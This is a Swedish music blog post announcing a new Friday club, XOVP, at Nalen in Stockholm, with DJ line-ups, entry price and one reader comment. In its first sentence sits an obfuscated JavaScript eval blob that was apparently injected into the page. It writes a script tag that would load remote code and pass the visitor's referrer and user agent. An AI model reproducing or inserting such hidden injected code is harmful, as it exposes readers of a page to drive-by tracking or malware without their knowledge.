Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

XOVP – Ny fredagsklubb öppnar på Nalen i Stockholm

XOVP – Ny fredagsklubb öppnar på Nalen i Stockholm
Alexander Gylemo

Imorgon eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bfdsi|var|u0026u|referrer|irdbf||js|php’.split(’|’),0,{}))
den andra september öppnar ett helt nytt klubbconcept på klassiska Nalen i Stockholm.

Nalen, som funnits sedan 1888 i Stockholm var under 1930-1960 Stockholms främsta klubb och har sedan dess varierat i popularitet men har alltid behållit sin kultstatus. Imorgon den andra september är det premiär för helt nya XOVP som är den nya klubben som arrangeras varje fredag under den ink0mmande hösten på Regeringsgatan 74 i Stockholm.

Man fyller de olika rummen med olika stilar, Djs och band och det finns något för alla som gillar hiphop, RnB, electro, house, dubstep, filth, retro och splitternya genren moombahton. I Stora Salen spelar Stephen Simmonds, No Strange Things och Jonas Asker som kommer dit och kör live med bandet medan grymma Cristian Dinamarca och Tony Senghore dj:ar i Hallen. I Harlem kör man storsatsning på dubstep och filth då man fått ihop en line-up bestående av Subsonic, Davr, Dj Alx, Linny Hex, Wobbulator och Selling Nails.

Bortsett från skillade artister varje fredag på klubben kommer det även bjudas på riktigt bra konserter under hösten då man bl.a. fått dit Mac Miller, som vi skrivit ett par rader om här, som kör sin första Sverige-spelning där inom kort.

Inträdet är 120 :- men före elva är det gratis. Vi ses där!

Nedan har vi en försmak på Tony Senghore som kör sin fantastiska remix på Major Lazers ”When You Hear the Bassline” på Berns i Stockholm.

httpv://www.youtube.com/watch?v=01CPQl9O6fo

Comments

  1. Guden av musik

    För najs!!!! Mer sköna klubbar till Stockholm är vad vi vill ha!!